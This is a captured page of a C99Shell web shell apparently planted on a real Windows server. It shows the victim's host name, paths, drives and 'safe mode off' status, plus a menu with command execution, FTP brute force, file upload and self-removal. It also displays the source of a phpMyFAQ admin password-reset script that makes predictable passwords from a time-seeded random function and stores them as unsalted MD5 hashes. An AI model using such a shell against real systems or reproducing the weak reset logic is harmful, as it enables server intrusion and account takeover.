!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\aulavirtual\admin\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     password.php (5.55 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
* $Id: password.php,v 1.4.2.9.2.4 2007/04/24 20:28:55 matteo Exp $
*
* Reset a forgotten password to a new one
*
* @author       Thorsten Rinne <thorsten@phpmyfaq.de>
* @since        2004-05-11
* @copyright    (c) 2004 - 2007 phpMyFAQ Team
*
* The contents of this file are subject to the Mozilla Public License
* Version 1.1 (the "License"); you may not use this file except in
* compliance with the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS"
* basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
* License for the specific language governing rights and limitations
* under the License.
*/

define('PMF_ROOT_DIR'dirname(dirname(__FILE__)));

require_once(
PMF_ROOT_DIR.'/inc/functions.php');
require_once(
PMF_ROOT_DIR.'/inc/init.php');
define('IS_VALID_PHPMYFAQ_ADMIN'null);
PMF_Init::cleanRequest();

// Just for security reasons - thanks to Johannes for the hint
$_SERVER['PHP_SELF'] = str_replace('%2F''/'rawurlencode($_SERVER['PHP_SELF']));
$_SERVER['HTTP_USER_AGENT'] = urlencode($_SERVER['HTTP_USER_AGENT']);



/* read configuration */
require_once(PMF_ROOT_DIR."/inc/data.php");
require_once(
PMF_ROOT_DIR."/inc/config.php");
require_once(
PMF_ROOT_DIR."/inc/constants.php");

/* include classes and functions */
require_once (PMF_ROOT_DIR."/inc/db.php");
define("SQLPREFIX"$DB["prefix"]);
$db db::db_select($DB["type"]);
$db->connect($DB["server"], $DB["user"], $DB["password"], $DB["db"]);
require_once(
PMF_ROOT_DIR."/inc/category.php");
require_once(
PMF_ROOT_DIR."/inc/idna_convert.class.php");
$IDN = new idna_convert;


// get language (default: english)
$pmf = new PMF_Init();
$LANGCODE $pmf->setLanguage((isset($PMF_CONF['detection']) ? true false), $PMF_CONF['language']);

if (isset(
$LANGCODE) && isset($languageCodes[strtoupper($LANGCODE)])) {
    require_once(
PMF_ROOT_DIR."/lang/language_".$LANGCODE.".php");
} else {
    
$LANGCODE "en";
    require_once(
PMF_ROOT_DIR."/lang/language_en.php");
}

/* header of the admin page */
require_once ("header.php");
?>
</div>
<div id="bodyText">
<?php
if (isset($_GET["action"]) && $_GET["action"] == "newpassword") {

    }
elseif (isset(
$_GET["action"]) && $_GET["action"] == "savenewpassword") {

    }
elseif (isset(
$_GET["action"]) && $_GET["action"] == "sendmail") {
    if (isset(
$_POST["username"]) && $_POST["username"] != "" && isset($_POST["email"]) && $_POST["email"] != "" && checkEmail($_POST["email"])) {
        
$username $db->escape_string($_POST["username"]);
        
$email $db->escape_string($_POST["email"]);
        
$num $db->num_rows($db->query("SELECT name, email FROM ".SQLPREFIX."faquser WHERE name = '".$username."' AND email = '".$email."'"));
        if (
$num == 1) {
            
$consonants = array("b","c","d","f","g","h","j","k","l","m","n","p","r","s","t","v","w","x","y","z");
            
$vowels = array("a","e","i","o","u");
            
$newPassword "";
            
srand((double)microtime()*1000000);
            for (
$i 1$i <= 4$i++) {
                
$newPassword .= $consonants[rand(0,19)];
                
$newPassword .= $vowels[rand(0,4)];
                }
            
$db->query("UPDATE ".SQLPREFIX."faquser SET pass = '".md5($newPassword)."' WHERE name = '".$username."' AND email = '".$email."'");
            
$text $PMF_LANG["lostpwd_text_1"]."\nUsername: ".$username."\nNew Password: ".$newPassword."\n\n".$PMF_LANG["lostpwd_text_2"];
            
mail($IDN->encode($email), $PMF_CONF["title"].": username / password request"$text"From: ".$IDN->encode($PMF_CONF["adminmail"]));
            print 
$PMF_LANG["lostpwd_mail_okay"];
            print 
"<p><img src=\"images/arrow.gif\" width=\"11\" height=\"11\" alt=\"".$PMF_LANG["ad"]."\" border=\"0\" /> <a href=\"index.php\" title=\"".$PMF_LANG["ad"]."\">".$PMF_LANG["ad"]."</a></p>";
            }
        else {
            print 
$PMF_LANG["lostpwd_err_1"];
            }
        }
    else {
        print 
$PMF_LANG["lostpwd_err_2"];
        }
    }
else {
?>
    <form action="<?php print $_SERVER["PHP_SELF"]; ?>?action=sendmail" method="post">
    <fieldset class="login">
        <legend class="login"><?php print $PMF_LANG["ad_passwd_cop"]; ?></legend>

        <label class="left"><?php print $PMF_LANG["ad_auth_user"]; ?></label>
        <input type="text" name="username" size="30" /><br />

        <label class="left"><?php print $PMF_LANG["ad_entry_email"]; ?></label>
        <input type="text"  name="email" size="30" /><br />

        <input class="submit" style="margin-left: 190px;" type="submit" value="<?php print $PMF_LANG["msgNewContentSubmit"]; ?>" /><br />

        <p><img src="images/arrow.gif" width="11" height="11" alt="<?php print $PMF_LANG["ad_sess_back"]; ?> FAQ" border="0" /> <a href="index.php" title="<?php print $PMF_LANG["ad_sess_back"]; ?> FAQ"><?php print $PMF_LANG["ad_sess_back"]; ?></a></p>
        <p><img src="images/arrow.gif" width="11" height="11" alt="<?php print PMF_htmlentities($PMF_CONF["title"], ENT_QUOTES$PMF_LANG['metaCharset']); ?> FAQ" border="0" /> <a href="../index.php" title="<?php print PMF_htmlentities($PMF_CONF["title"], ENT_QUOTES$PMF_LANG['metaCharset']); ?> FAQ"><?php print PMF_htmlentities($PMF_CONF["title"], ENT_QUOTES$PMF_LANG['metaCharset']); ?> FAQ</a></p>

    </fieldset>
    </form>
<?php
    
}

if (
DEBUG == TRUE) {
    print 
"<p>DEBUG INFORMATION:</p>\n";
    print 
"<p>".$db->sqllog()."</p>";
    }

require_once (
"footer.php");
$db->dbclose();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--